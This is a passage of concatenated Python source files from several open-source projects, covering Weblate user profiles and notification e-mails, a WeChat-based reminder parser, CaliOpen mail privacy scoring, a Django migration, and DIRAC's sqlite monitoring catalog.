''' mails = [] subscriptions = Profile.objects.subscribed_new_suggestion( unit.translation.subproject.project, unit.translation.language, user ) for subscription in subscriptions: mails.append( subscription.notify_new_suggestion( unit.translation, suggestion, unit ) ) send_mails(mails) def notify_new_comment(unit, comment, user, report_source_bugs): ''' Notify about new comment. ''' mails = [] subscriptions = Profile.objects.subscribed_new_comment( unit.translation.subproject.project, comment.language, user ) for subscription in subscriptions: mails.append( subscription.notify_new_comment(unit, comment, user) ) # Notify upstream if comment.language is None and report_source_bugs != '': send_notification_email( 'en', report_source_bugs, 'new_comment', unit.translation, { 'unit': unit, 'comment': comment, 'subproject': unit.translation.subproject, }, user=user, ) send_mails(mails) def get_notification_email(language, email, notification, translation_obj=None, context=None, headers=None, user=None, info=None): ''' Renders notification email. 
''' cur_language = django_translation.get_language() context = context or {} headers = headers or {} references = None if 'unit' in context: unit = context['unit'] references = '{0}/{1}/{2}/{3}'.format( unit.translation.subproject.project.slug, unit.translation.subproject.slug, unit.translation.language.code, unit.id ) if references is not None: references = '<{0}@{1}>'.format(references, get_site_domain()) headers['In-Reply-To'] = references headers['References'] = references try: if info is None: info = translation_obj.__unicode__() LOGGER.info( 'sending notification %s on %s to %s', notification, info, email ) # Load user language if language is not None: django_translation.activate(language) # Template name context['subject_template'] = 'mail/{}_subject.txt'.format( notification ) # Adjust context context['current_site_url'] = get_site_url() if translation_obj is not None: context['translation'] = translation_obj context['translation_url'] = get_site_url( translation_obj.get_absolute_url() ) context['site_title'] = SITE_TITLE # Render subject subject = render_to_string( context['subject_template'], context ).strip() # Render body body = render_to_string( 'mail/{}.txt'.format(notification), context ) html_body = render_to_string( 'mail/{}.html'.format(notification), context ) # Define headers headers['Auto-Submitted'] = 'auto-generated' headers['X-AutoGenerated'] = 'yes' headers['Precedence'] = 'bulk' headers['X-Mailer'] = 'Weblate {}'.format(VERSION) # Reply to header if user is not None: headers['Reply-To'] = user.email # List of recipients if email == 'ADMINS': emails = [a[1] for a in settings.ADMINS] else: emails = [email] # Create message email = EmailMultiAlternatives( settings.EMAIL_SUBJECT_PREFIX + subject, body, to=emails, headers=headers, ) email.attach_alternative( html_body, 'text/html' ) # Return the mail return email finally: django_translation.activate(cur_language) def send_notification_email(language, email, notification, translation_obj=None, 
context=None, headers=None, user=None, info=None): ''' Renders and sends notification email. ''' email = get_notification_email( language, email, notification, translation_obj, context, headers, user, info ) send_mails([email]) class VerifiedEmail(models.Model): ''' Storage for verified emails from auth backends. ''' social = models.ForeignKey(UserSocialAuth) email = models.EmailField(max_length=254) def __unicode__(self): return u'{0} - {1}'.format( self.social.user.username, self.email ) class ProfileManager(models.Manager): ''' Manager providing shortcuts for subscription queries. ''' # pylint: disable=W0232 def subscribed_any_translation(self, project, language, user): return self.filter( subscribe_any_translation=True, subscriptions=project, languages=language ).exclude( user=user ) def subscribed_new_language(self, project, user): return self.filter( subscribe_new_language=True, subscriptions=project, ).exclude( user=user ) def subscribed_new_string(self, project, language): return self.filter( subscribe_new_string=True, subscriptions=project, languages=language ) def subscribed_new_suggestion(self, project, language, user): ret = self.filter( subscribe_new_suggestion=True, subscriptions=project, languages=language ) # We don't want to filter out anonymous user if user is not None and user.is_authenticated(): ret = ret.exclude(user=user) return ret def subscribed_new_contributor(self, project, language, user): return self.filter( subscribe_new_contributor=True, subscriptions=project, languages=language ).exclude( user=user ) def subscribed_new_comment(self, project, language, user): ret = self.filter( subscribe_new_comment=True, subscriptions=project ).exclude( user=user ) # Source comments go to every subscriber if language is not None: ret = ret.filter(languages=language) return ret def subscribed_merge_failure(self, project): return self.filter(subscribe_merge_failure=True, subscriptions=project) class Profile(models.Model): ''' User profiles storage. 
''' user = models.OneToOneField(User, unique=True, editable=False) language = models.CharField( verbose_name=_(u"Interface Language"), max_length=10, choices=settings.LANGUAGES ) languages = models.ManyToManyField( Language, verbose_name=_('Translated languages'), blank=True, help_text=_('Choose languages to which you can translate.') ) secondary_languages = models.ManyToManyField( Language, verbose_name=_('Secondary languages'), related_name='secondary_profile_set', blank=True, ) suggested = models.IntegerField(default=0, db_index=True) translated = models.IntegerField(default=0, db_index=True) hide_completed = models.BooleanField( verbose_name=_('Hide completed translations on dashboard'), default=False ) secondary_in_zen = models.BooleanField( verbose_name=_('Show secondary translations in zen mode'), default=True ) hide_source_secondary = models.BooleanField( verbose_name=_('Hide source if there is secondary language'), default=False ) subscriptions = models.ManyToManyField( 'trans.Project', verbose_name=_('Subscribed projects'), blank=True, ) subscribe_any_translation = models.BooleanField( verbose_name=_('Notification on any translation'), default=False ) subscribe_new_string = models.BooleanField( verbose_name=_('Notification on new string to translate'), default=False ) subscribe_new_suggestion = models.BooleanField( verbose_name=_('Notification on new suggestion'), default=False ) subscribe_new_contributor = models.BooleanField( verbose_name=_('Notification on new contributor'), default=False ) subscribe_new_comment = models.BooleanField( verbose_name=_('Notification on new comment'), default=False ) subscribe_merge_failure = models.BooleanField( verbose_name=_('Notification on merge failure'), default=False ) subscribe_new_language = models.BooleanField( verbose_name=_('Notification on new language request'), default=False ) SUBSCRIPTION_FIELDS = ( 'subscribe_any_translation', 'subscribe_new_string', 'subscribe_new_suggestion', 
'subscribe_new_contributor', 'subscribe_new_comment', 'subscribe_merge_failure', 'subscribe_new_language', ) objects = ProfileManager() def __unicode__(self): return self.user.username def get_user_display(self): return get_user_display(self.user) def get_user_display_link(self): return get_user_display(self.user, True, True) def get_user_name(self): return get_user_display(self.user, False) @models.permalink def get_absolute_url(self): return ('user_page', (), { 'user': self.user.username }) @property def last_change(self): ''' Returns date of last change user has done in Weblate. ''' try: return self.user.change_set.all()[0].timestamp except IndexError: return None def notify_user(self, notification, translation_obj, context=None, headers=None, user=None): ''' Wrapper for sending notifications to user. ''' if context is None: context = {} if headers is None: headers = {} # Check whether user is still allowed to access this project if not translation_obj.has_acl(self.user): return # Generate notification return get_notification_email( self.language, self.user.email, notification, translation_obj, context, headers, user=user ) def notify_any_translation(self, unit, oldunit): ''' Sends notification on translation. ''' if oldunit.translated: template = 'changed_translation' else: template = 'new_translation' return self.notify_user( template, unit.translation, { 'unit': unit, 'oldunit': oldunit, } ) def notify_new_language(self, subproject, language, user): ''' Sends notification on new language request. ''' return self.notify_user( 'new_language', subproject, { 'language': language, 'user': user, }, user=user ) def notify_new_string(self, translation): ''' Sends notification on new strings to translate. ''' return self.notify_user( 'new_string', translation, ) def notify_new_suggestion(self, translation, suggestion, unit): ''' Sends notification on new suggestion. 
''' return self.notify_user( 'new_suggestion', translation, { 'suggestion': suggestion, 'unit': unit, } ) def notify_new_contributor(self, translation, user): ''' Sends notification on new contributor. ''' return self.notify_user( 'new_contributor', translation, { 'user': user, } ) def notify_new_comment(self, unit, comment, user): ''' Sends notification about new comment. ''' return self.notify_user( 'new_comment', unit.translation, { 'unit': unit, 'comment': comment, 'subproject': unit.translation.subproject, }, user=user, ) def notify_merge_failure(self, subproject, error, status): ''' Sends notification on merge failure. ''' return self.notify_user( 'merge_failure', subproject, { 'subproject': subproject, 'error': error, 'status': status, } ) @property def full_name(self): ''' Returns user's full name. ''' return self.user.first_name def set_lang(request, profile): """ Sets session language based on user preferences. """ request.session[LANGUAGE_SESSION_KEY] = profile.language @receiver(user_logged_in) def post_login_handler(sender, request, user, **kwargs): ''' Signal handler for setting user language and migrating profile if needed. ''' # Warning about setting password if (getattr(user, 'backend', '').endswith('.EmailAuth') and not user.has_usable_password()): request.session['show_set_password'] = True # Ensure user has a profile profile = Profile.objects.get_or_create(user=user)[0] # Migrate django-registration based verification to python-social-auth if (user.has_usable_password() and not user.social_auth.filter(provider='email').exists()): social = user.social_auth.create( provider='email', uid=user.email, ) VerifiedEmail.objects.create( social=social, email=user.email, ) # Set language for session based on preferences set_lang(request, profile) def create_groups(update): ''' Creates standard groups and gives them permissions. 
''' guest_group, created = Group.objects.get_or_create(name='Guests') if created or update: guest_group.permissions.add( Permission.objects.get(codename='can_see_git_repository'), Permission.objects.get(codename='add_suggestion'), ) group, created = Group.objects.get_or_create(name='Users') if created or update: group.permissions.add( Permission.objects.get(codename='upload_translation'), Permission.objects.get(codename='overwrite_translation'), Permission.objects.get(codename='save_translation'), Permission.objects.get(codename='save_template'), Permission.objects.get(codename='accept_suggestion'), Permission.objects.get(codename='delete_suggestion'), Permission.objects.get(codename='vote_suggestion'), Permission.objects.get(codename='ignore_check'), Permission.objects.get(codename='upload_dictionary'), Permission.objects.get(codename='add_dictionary'), Permission.objects.get(codename='change_dictionary'), Permission.objects.get(codename='delete_dictionary'), Permission.objects.get(codename='lock_translation'), Permission.objects.get(codename='can_see_git_repository'), Permission.objects.get(codename='add_comment'), Permission.objects.get(codename='add_suggestion'), Permission.objects.get(codename='use_mt'), ) owner_permissions = ( Permission.objects.get(codename='author_translation'), Permission.objects.get(codename='upload_translation'), Permission.objects.get(codename='overwrite_translation'), Permission.objects.get(codename='commit_translation'), Permission.objects.get(codename='update_translation'), Permission.objects.get(codename='push_translation'), Permission.objects.get(codename='automatic_translation'), Permission.objects.get(codename='save_translation'), Permission.objects.get(codename='save_template'), Permission.objects.get(codename='accept_suggestion'), Permission.objects.get(codename='vote_suggestion'), Permission.objects.get(codename='override_suggestion'), Permission.objects.get(codename='delete_comment'), 
Permission.objects.get(codename='delete_suggestion'), Permission.objects.get(codename='ignore_check'), Permission.objects.get(codename='upload_dictionary'), Permission.objects.get(codename='add_dictionary'), Permission.objects.get(codename='change_dictionary'), Permission.objects.get(codename='delete_dictionary'), Permission.objects.get(codename='lock_subproject'), Permission.objects.get(codename='reset_translation'), Permission.objects.get(codename='lock_translation'), Permission.objects.get(codename='can_see_git_repository'), Permission.objects.get(codename='add_comment'), Permission.objects.get(codename='delete_comment'), Permission.objects.get(codename='add_suggestion'), Permission.objects.get(codename='use_mt'), Permission.objects.get(codename='edit_priority'), Permission.objects.get(codename='edit_flags'), Permission.objects.get(codename='manage_acl'), Permission.objects.get(codename='download_changes'), Permission.objects.get(codename='view_reports'), ) group, created = Group.objects.get_or_create(name='Managers') if created or update: group.permissions.add(*owner_permissions) group, created = Group.objects.get_or_create(name='Owners') if created or update: group.permissions.add(*owner_permissions) created = True try: anon_user = User.objects.get( username=ANONYMOUS_USER_NAME, ) created = False if anon_user.is_active: raise ValueError( 'Anonymous user ({}) already exists and enabled, ' 'please change ANONYMOUS_USER_NAME setting.'.format( ANONYMOUS_USER_NAME, ) ) except User.DoesNotExist: anon_user = User.objects.create( username=ANONYMOUS_USER_NAME, is_active=False, ) if created or update: anon_user.set_unusable_password() anon_user.groups.clear() anon_user.groups.add(guest_group) def move_users(): ''' Moves users to default group. ''' group = Group.objects.get(name='Users') for user in User.objects.all(): user.groups.add(group) def remove_user(user): ''' Removes user account. 
    The account is anonymized and disabled rather than deleted from the
    database.
    '''
    # Send signal (to commit any pending changes)
    user_pre_delete.send(instance=user, sender=user.__class__)

    # Change username to an anonymized placeholder; keep appending random
    # hex suffixes until the name is unique.
    user.username = 'deleted-{0}'.format(user.pk)
    while User.objects.filter(username=user.username).exists():
        user.username = 'deleted-{0}-{1}'.format(
            user.pk, binascii.b2a_hex(os.urandom(5))
        )

    # Remove user information
    user.first_name = 'Deleted User'
    user.last_name = ''
    user.email = 'noreply@weblate.org'

    # Disable the user
    user.is_active = False
    user.set_unusable_password()
    user.save()

    # Remove all social auth associations
    user.social_auth.all().delete()


@receiver(post_migrate)
def sync_create_groups(sender, **kwargs):
    '''
    Create groups on syncdb.

    Only reacts to the "accounts" application so this does not re-run
    for every other migrated app.
    '''
    if sender.label == 'accounts':
        create_groups(False)


@receiver(post_save, sender=User)
def create_profile_callback(sender, instance, created=False, **kwargs):
    '''
    Automatically adds user to Users group.
    '''
    if created:
        # Add user to Users group if it exists
        # (it may not, e.g. before create_groups has run).
        try:
            group = Group.objects.get(name='Users')
            instance.groups.add(group)
        except Group.DoesNotExist:
            pass
polyrabbit/WeCron
WeCron/wxhook/todo_parser/__init__.py
#coding: utf-8
from __future__ import unicode_literals, absolute_import
import logging
import json

from django.utils.dateparse import parse_datetime
from django.utils import timezone
from wechatpy.exceptions import WeChatClientException

from common import wechat_client
from .local_parser import LocalParser
from remind.models import Remind
from .exceptions import ParseError

logger = logging.getLogger(__name__)


def parse(text, **kwargs):
    """Parse a natural-language reminder request into a ``Remind``.

    :param text: the user's message text.
    :param kwargs: extra parameters forwarded to the WeChat semantic API.
    :return: a ``Remind`` with at least ``time`` set.
    :raises ParseError: if the parsed time is not in the future.
    """
    # Try to parse by rules and then turn to wechat API since wechat API is unstable and inaccurate.
    logger.info('Trying to parse "%s" using rules.', text)
    reminder = LocalParser().parse_by_rules(text)
    if not reminder:
        logger.info('Failed to parse time from "%s" using rules, try wechat api.', text)
        reminder = parse_by_wechat_api(text, **kwargs)
    if reminder.time <= timezone.now():  # GMT and UTC time can compare with each other
        raise ParseError('/:no%s已经过去了,请重设一个将来的提醒。\n\n消息: %s' % (
            reminder.time.strftime('%Y-%m-%d %H:%M'), text))
    return reminder


def parse_by_wechat_api(text, **kwargs):
    """
    {
        "errcode": 0,
        "query": "提醒我上午十点开会",
        "semantic": {
            "details": {
                "answer": "",
                "context_info": {},
                "datetime": {
                    "date": "2015-12-23",
                    "date_lunar": "2015-11-13",
                    "time": "10:00:00",
                    "time_ori": "上午十点",
                    "type": "DT_ORI",
                    "week": "3"
                },
                "event": "开会",
                "hit_str": "提醒 我 上午 十点 开会 ",
                "remind_type": "0"
            },
            "intent": "SEARCH"
        },
        "type": "remind"
    }
    """
    # NOTE: the docstring above is a sample API response; it doubles as
    # offline test data via the commented-out json.loads call below.
    try:
        wechat_result = wechat_client.semantic.search(
            query=text,
            category='remind',
            city='上海',  # F**k, weixin always needs the city param, hard-code one.
            **kwargs
        )
    except WeChatClientException as e:
        logger.info('Failed to parse using wechat api ' + str(e))
        raise
    # wechat_result = json.loads(parse_by_wechat_api.__doc__)
    logger.debug('Semantic result from wechat, %s', json.dumps(wechat_result, ensure_ascii=False))
    # '+08:00': the API presumably returns Beijing local time — the offset is
    # hard-coded so parse_datetime yields an aware datetime. NOTE(review): a
    # response missing 'semantic'/'details'/'datetime' raises KeyError here
    # rather than ParseError — confirm whether that is intended.
    dt_str = '%s %s+08:00' % (
        wechat_result['semantic']['details']['datetime']['date'],
        wechat_result['semantic']['details']['datetime']['time'],
    )  # there could be nothing in details
    dt = parse_datetime(dt_str)
    return Remind(time=dt,
                  desc=wechat_result.get('query', ''),
                  event=wechat_result['semantic']['details'].get('event', ''))


def parse_by_boson(text):
    # Placeholder for an alternative parser backend; not implemented.
    pass
s-gogna/JST
mips/configurations.py
# This file is part of JST. # # JST is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # JST is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with JST. If not, see <http://www.gnu.org/licenses/>. # This file was made to prevent circular dependencies, if we can do something better, let's do it import mips.registers as mr SPILL_MEM_LABEL = 'SPILL_MEMORY' SPILL_MEM_SIZE = 64 # bytes TEMPROARY_REGISTER_SET = mr.T_REGISTERS NOT_TESTING_FUNCTIONS = False
CaliOpen/CaliOpen
src/backend/components/py.pi/caliopen_pi/features/mail.py
# -*- coding: utf-8 -*- """Caliopen mail message privacy features extraction methods.""" from __future__ import absolute_import, print_function, unicode_literals import logging import pgpy from caliopen_main.pi.parameters import PIParameter from .helpers.spam import SpamScorer from .helpers.ingress_path import get_ingress_features from .helpers.importance_level import compute_importance from .types import init_features log = logging.getLogger(__name__) TLS_VERSION_PI = { 'tlsv1/sslv3': 2, 'tls1': 7, 'tlsv1': 7, 'tls12': 10, } PGP_MESSAGE_HEADER = '\n-----BEGIN PGP MESSAGE-----' class InboundMailFeature(object): """Process a parsed mail message and extract available privacy features.""" def __init__(self, message, config): """Get a ``MailMessage`` instance and extract privacy features.""" self.message = message self.config = config self._features = init_features('message') def is_blacklist_mx(self, mx): """MX is blacklisted.""" blacklisted = self.config.get('blacklistes.mx') if not blacklisted: return False if mx in blacklisted: return True return False def is_whitelist_mx(self, mx): """MX is whitelisted.""" whitelistes = self.config.get('whitelistes.mx') if not whitelistes: return False if mx in whitelistes: return True return False @property def internal_domains(self): """Get internal hosts from configuration.""" domains = self.config.get('internal_domains') return domains if domains else [] def emitter_reputation(self, mx): """Return features about emitter.""" if self.is_blacklist_mx(mx): return 'blacklisted' if self.is_whitelist_mx(mx): return 'whitelisted' return 'unknown' def emitter_certificate(self): """Get the certificate from emitter.""" return None @property def mail_agent(self): """Get the mailer used for this message.""" # XXX normalize better and more ? 
return self.message.mail.get('X-Mailer', '').lower() @property def transport_signature(self): """Get the transport signature if any.""" return self.message.mail.get('DKIM-Signature') @property def spam_informations(self): """Return a global spam_score and related features.""" spam = SpamScorer(self.message.mail) return {'spam_score': spam.score, 'spam_method': spam.method, 'is_spam': spam.is_spam} @property def is_internal(self): """Return true if it's an internal message.""" from_ = self.message.mail.get('From') for domain in self.internal_domains: if domain in from_: return True return False def get_signature_informations(self): """Get message signature features.""" signed_parts = [x for x in self.message.attachments if 'pgp-sign' in x.content_type] if not signed_parts: return {} sign = pgpy.PGPSignature() features = {'message_signed': True, 'message_signature_type': 'PGP'} try: sign.parse(signed_parts[0].data) features.update({'message_signer': sign.signer}) except Exception as exc: log.error('Unable to parse pgp signature {}'.format(exc)) return features def get_encryption_informations(self): """Get message encryption features.""" is_encrypted = False if 'encrypted' in self.message.extra_parameters: is_encrypted = True # Maybe pgp/inline ? 
if not is_encrypted: try: body = self.message.body_plain.decode('utf-8') if body.startswith(PGP_MESSAGE_HEADER): is_encrypted = True except UnicodeDecodeError: log.warn('Invalid body_plain encoding for message') pass return {'message_encrypted': is_encrypted, 'message_encryption_method': 'pgp' if is_encrypted else ''} def _get_features(self): """Extract privacy features.""" features = self._features.copy() received = self.message.headers.get('Received', []) features.update(get_ingress_features(received, self.internal_domains)) mx = features.get('ingress_server') reputation = None if not mx else self.emitter_reputation(mx) features['mail_emitter_mx_reputation'] = reputation features['mail_emitter_certificate'] = self.emitter_certificate() features['mail_agent'] = self.mail_agent features['is_internal'] = self.is_internal features.update(self.get_signature_informations()) features.update(self.get_encryption_informations()) features.update(self.spam_informations) if self.transport_signature: features.update({'transport_signed': True}) return features def _compute_pi(self, participants, features): """Compute Privacy Indexes for a message.""" log.info('PI features {}'.format(features)) pi_cx = {} # Contextual privacy index pi_co = {} # Comportemental privacy index pi_t = {} # Technical privacy index reput = features.get('mail_emitter_mx_reputation') if reput == 'whitelisted': pi_cx['reputation_whitelist'] = 20 elif reput == 'unknown': pi_cx['reputation_unknow'] = 10 known_contacts = [] known_public_key = 0 for part, contact in participants: if contact: known_contacts.append(contact) if contact.public_key: known_public_key += 1 if len(participants) == len(known_contacts): # - Si tous les contacts sont déjà connus le PIᶜˣ # augmente de la valeur du PIᶜᵒ le plus bas des PIᶜᵒ des contacts. 
contact_pi_cos = [x.pi['comportment'] for x in known_contacts if x.pi and 'comportment' in x.pi] if contact_pi_cos: pi_cx['known_contacts'] = min(contact_pi_cos) if known_public_key == len(known_contacts): pi_co['contact_pubkey'] = 20 ext_hops = features.get('nb_external_hops', 0) if ext_hops <= 1: tls = features.get('ingress_socket_version') if tls: if tls not in TLS_VERSION_PI: log.warn('Unknown TLS version {}'.format(tls)) else: pi_t += TLS_VERSION_PI[tls] if features.get('mail_emitter_certificate'): pi_t['emitter_certificate'] = 10 if features.get('transport_signed'): pi_t['transport_signed'] = 10 if features.get('message_encrypted'): pi_t['encrypted'] = 30 log.info('PI compute t:{} cx:{} co:{}'.format(pi_t, pi_cx, pi_co)) return PIParameter({'technic': sum(pi_t.values()), 'context': sum(pi_cx.values()), 'comportment': sum(pi_co.values()), 'version': 0}) def process(self, user, message, participants): """ Process the message for privacy features and PI compute. :param user: user the message belong to :ptype user: caliopen_main.user.core.User :param message: a message parameter that will be updated with PI :ptype message: NewMessage :param participants: an array of participant with related Contact :ptype participants: list(Participant, Contact) """ features = self._get_features() message.pi = self._compute_pi(participants, features) il = compute_importance(user, message, features, participants) message.privacy_features = features message.importance_level = il
sostenibilidad-unam/posgrado
posgradmin/posgradmin/migrations/0040_auto_20191120_2258.py
# -*- coding: utf-8 -*- # Generated by Django 1.11.13 on 2019-11-21 04:58 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('posgradmin', '0039_auto_20191120_2249'), ] operations = [ migrations.AlterModelOptions( name='profesor', options={'ordering': ['user__first_name', 'user__last_name'], 'verbose_name_plural': 'Profesores'}, ), ]
ic-hep/DIRAC
src/DIRAC/FrameworkSystem/private/monitoring/MonitoringCatalog.py
""" Interacts with sqlite3 db """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import six import sqlite3 import os import hashlib import random import time import DIRAC from DIRAC import gLogger, S_OK, S_ERROR from DIRAC.FrameworkSystem.private.monitoring.Activity import Activity from DIRAC.Core.Utilities import Time class MonitoringCatalog(object): """ This class is used to perform all kinds queries to the sqlite3 database. """ def __init__(self, dataPath): """ Initialize monitoring catalog """ self.dbConn = False self.dataPath = dataPath self.log = gLogger.getSubLogger("ActivityCatalog") self.createSchema() def __connect(self): """ Connects to database """ if not self.dbConn: dbPath = "%s/monitoring.db" % self.dataPath self.dbConn = sqlite3.connect(dbPath, timeout=20, isolation_level=None) # These two settings dramatically increase the performance # at the cost of a small corruption risk in case of OS crash # It is acceptable though, given the nature of the data # details here https://www.sqlite.org/pragma.html c = self.dbConn.cursor() c.execute("PRAGMA synchronous = OFF") c.execute("PRAGMA journal_mode = TRUNCATE") def __dbExecute(self, query, values=False): """ Executes a sql statement. :type query: string :param query: The query to be executed. :type values: bool :param values: To execute query with values or not. :return: the cursor. 
""" cursor = self.dbConn.cursor() # pylint: disable=no-member self.log.debug("Executing %s" % query) executed = False retry = 0 while not executed and retry < 10: retry += 1 try: if values: cursor.execute(query, values) else: cursor.execute(query) executed = True except Exception as e: self.log.exception("Exception executing statement", "query: %s, values: %s" % (query, values)) time.sleep(random.random()) if not executed: self.log.error("Could not execute query, big mess ahead", "query: %s, values: %s" % (query, values)) return cursor def __createTables(self): """ Creates tables if not already created """ self.log.info("Creating tables in db") try: filePath = "%s/monitoringSchema.sql" % os.path.dirname(__file__) fd = open(filePath) buff = fd.read() fd.close() except IOError as e: DIRAC.abort(1, "Can't read monitoring schema", filePath) while buff.find(";") > -1: limit = buff.find(";") + 1 sqlQuery = buff[:limit].replace("\n", "") buff = buff[limit:] try: self.__dbExecute(sqlQuery) except Exception as e: DIRAC.abort(1, "Can't create tables", str(e)) def createSchema(self): """ Creates all the sql schema if it does not exist """ self.__connect() try: sqlQuery = "SELECT name FROM sqlite_master WHERE type='table';" c = self.__dbExecute(sqlQuery) tablesList = c.fetchall() if len(tablesList) < 2: self.__createTables() except Exception as e: self.log.fatal("Failed to startup db engine", str(e)) return False return True def __delete(self, table, dataDict): """ Executes an sql delete. :type table: string :param table: name of the table. :type dataDict: dictionary :param dataDict: the data dictionary. """ query = "DELETE FROM %s" % table valuesList = [] keysList = [] for key in dataDict: if isinstance(dataDict[key], list): orList = [] for keyValue in dataDict[key]: valuesList.append(keyValue) orList.append("%s = ?" % key) keysList.append("( %s )" % " OR ".join(orList)) else: valuesList.append(dataDict[key]) keysList.append("%s = ?" 
% key) if keysList: query += " WHERE %s" % (" AND ".join(keysList)) self.__dbExecute("%s;" % query, values=valuesList) def __select(self, fields, table, dataDict, extraCond="", queryEnd=""): """ Executes a sql select. :type fields: string :param fields: The fields required in a string. :type table: string :param table: name of the table. :type dataDict: dictionary :param dataDict: the data dictionary. :return: a list of values. """ valuesList = [] keysList = [] for key in dataDict: if isinstance(dataDict[key], list): orList = [] for keyValue in dataDict[key]: valuesList.append(keyValue) orList.append("%s = ?" % key) keysList.append("( %s )" % " OR ".join(orList)) else: valuesList.append(dataDict[key]) keysList.append("%s = ?" % key) if isinstance(fields, six.string_types): fields = [fields] if len(keysList) > 0: whereCond = "WHERE %s" % (" AND ".join(keysList)) else: whereCond = "" if extraCond: if whereCond: whereCond += " AND %s" % extraCond else: whereCond = "WHERE %s" % extraCond query = "SELECT %s FROM %s %s %s;" % (",".join(fields), table, whereCond, queryEnd) c = self.__dbExecute(query, values=valuesList) return c.fetchall() def __insert(self, table, specialDict, dataDict): """ Executes an sql insert. :type table: string :param table: name of the table. :type specialDict: dictionary :param specialDict: the special dictionary. :type dataDict: dictionary :param dataDict: the data dictionary. :return: the number of rows inserted. """ valuesList = [] valuePoitersList = [] namesList = [] for key in specialDict: namesList.append(key) valuePoitersList.append(specialDict[key]) for key in dataDict: namesList.append(key) valuePoitersList.append("?") valuesList.append(dataDict[key]) query = "INSERT INTO %s (%s) VALUES (%s);" % (table, ", ".join(namesList), ",".join(valuePoitersList)) c = self.__dbExecute(query, values=valuesList) return c.rowcount def __update(self, newValues, table, dataDict, extraCond=""): """ Executes a sql update. 
:type table: string :param table: name of the table. :type newValues: dictionary :param newValues: a dictionary with new values. :type dataDict: dictionary :param dataDict: the data dictionary. :return: the number of rows updated. """ valuesList = [] keysList = [] updateFields = [] for key in newValues: updateFields.append("%s = ?" % key) valuesList.append(newValues[key]) for key in dataDict: if isinstance(dataDict[key], list): orList = [] for keyValue in dataDict[key]: valuesList.append(keyValue) orList.append("%s = ?" % key) keysList.append("( %s )" % " OR ".join(orList)) else: valuesList.append(dataDict[key]) keysList.append("%s = ?" % key) if len(keysList) > 0: whereCond = "WHERE %s" % (" AND ".join(keysList)) else: whereCond = "" if extraCond: if whereCond: whereCond += " AND %s" % extraCond else: whereCond = "WHERE %s" % extraCond query = "UPDATE %s SET %s %s;" % (table, ",".join(updateFields), whereCond) c = self.__dbExecute(query, values=valuesList) return c.rowcount def registerSource(self, sourceDict): """ Registers an activity source. :type sourceDict: dictionary :param sourceDict: the source dictionary. :return: a list of values. """ retList = self.__select("id", "sources", sourceDict) if len(retList) > 0: return retList[0][0] else: self.log.info("Registering source", str(sourceDict)) if self.__insert("sources", {"id": "NULL"}, sourceDict) == 0: return -1 return self.__select("id", "sources", sourceDict)[0][0] def registerActivity(self, sourceId, acName, acDict): """ Register an activity. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :type acDict: dictionary :param acDict: The activity dictionary containing information about 'category', 'description', 'bucketLength', 'type', 'unit'. :return: a list of values. 
""" m = hashlib.md5() acDict["name"] = acName acDict["sourceId"] = sourceId m.update(str(acDict).encode()) retList = self.__select("filename", "activities", acDict) if len(retList) > 0: return retList[0][0] else: acDict["lastUpdate"] = int(Time.toEpoch() - 86000) filePath = m.hexdigest() filePath = "%s/%s.rrd" % (filePath[:2], filePath) self.log.info("Registering activity", str(acDict)) # This is basically called by the ServiceInterface inside registerActivities method and then all the activity # information is stored in the sqlite3 db using the __insert method. if ( self.__insert( "activities", { "id": "NULL", "filename": "'%s'" % filePath, }, acDict, ) == 0 ): return -1 return self.__select("filename", "activities", acDict)[0][0] def getFilename(self, sourceId, acName): """ Gets rrd filename for an activity. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :return: The filename in a string. """ queryDict = {"sourceId": sourceId, "name": acName} retList = self.__select("filename", "activities", queryDict) if len(retList) == 0: return "" else: return retList[0][0] def findActivity(self, sourceId, acName): """ Finds activity. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :return: A list containing all the activity information. """ queryDict = {"sourceId": sourceId, "name": acName} retList = self.__select( "id, name, category, unit, type, description, filename, bucketLength, lastUpdate", "activities", queryDict ) if len(retList) == 0: return False else: return retList[0] def activitiesQuery(self, selDict, sortList, start, limit): """ Gets all the sources and activities details in a joined format. :type selDict: dictionary :param selDict: The fields inside the select query. :type sortList: list :param sortList: A list in sorted order of the data. :type start: int :param start: The point or tuple from where to start. 
:type limit: int :param limit: The number of tuples to select from the starting point. :return: S_OK with a tuple of the result list and fields list. """ fields = [ "sources.id", "sources.site", "sources.componentType", "sources.componentLocation", "sources.componentName", "activities.id", "activities.name", "activities.category", "activities.unit", "activities.type", "activities.description", "activities.bucketLength", "activities.filename", "activities.lastUpdate", ] extraSQL = "" if sortList: for sorting in sortList: if sorting[0] not in fields: return S_ERROR("Sorting field %s is invalid" % sorting[0]) extraSQL = "ORDER BY %s" % ",".join(["%s %s" % sorting for sorting in sortList]) if limit: if start: extraSQL += " LIMIT %s OFFSET %s" % (limit, start) else: extraSQL += " LIMIT %s" % limit # This method basically takes in some condition and then based on those performs SQL Join on the # sources and activities table of the sqlite3 db and returns the corresponding result. retList = self.__select( ", ".join(fields), "sources, activities", selDict, "sources.id = activities.sourceId", extraSQL ) return S_OK((retList, fields)) def setLastUpdate(self, sourceId, acName, lastUpdateTime): """ Updates the lastUpdate timestamp for a particular activity using the source id. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :type lastUpdateTime: string :param lastUpdateTime: The last update time in the proper format. :return: the number of rows updated. """ queryDict = {"sourceId": sourceId, "name": acName} return self.__update({"lastUpdate": lastUpdateTime}, "activities", queryDict) def getLastUpdate(self, sourceId, acName): """ Gets the lastUpdate timestamp for a particular activity using the source id. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :return: The last update time in string. 
